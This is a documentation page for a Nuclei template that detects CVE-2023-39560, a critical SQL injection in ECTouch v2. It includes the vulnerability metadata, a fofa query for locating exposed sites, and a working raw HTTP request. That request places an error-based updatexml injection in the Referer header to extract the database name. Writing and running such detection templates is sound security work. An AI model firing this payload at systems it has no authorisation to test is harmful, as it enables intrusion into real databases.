ECTouch v2 - SQL Injection
ID: CVE-2023-39560
Severity: critical
Author: s4e-io
Tags: cve,cve2023,ectouch,sqli
Description
Section titled “Description”ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr[‘id’] parameter at \default\helpers\insert.php.
YAML Source
Section titled “YAML Source”id: CVE-2023-39560
info: name: ECTouch v2 - SQL Injection author: s4e-io severity: critical description: | ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php. reference: - https://wiki.bachang.org/doc/2582/ - https://nvd.nist.gov/vuln/detail/CVE-2023-39560 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-39560 cwe-id: CWE-89 epss-score: 0.00139 epss-percentile: 0.50318 cpe: cpe:2.3:a:ectouch:ectouch:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ectouch product: ectouch fofa-query: icon_hash="127711143" tags: cve,cve2023,ectouch,sqli
http: - raw: - | GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1 Host: {{Hostname}} Referer: 554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}
matchers-condition: and matchers: - type: regex part: body regex: - "XPATH syntax error: '~[^~]+~'<br>"
- type: status status: - 200
extractors: - type: regex part: body group: 1 regex: - "XPATH syntax error: '~([a-z0-9]+)~'"# digest: 4b0a00483046022100934360c4524d8a9c57d882132cb92a9353fc7fcffe971437f0831edd159e1a6d022100dbeb1e36a8faa76e4aa7d8ec1600cc67f37c580b292caff668750e9c2928083e:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-39560.yaml"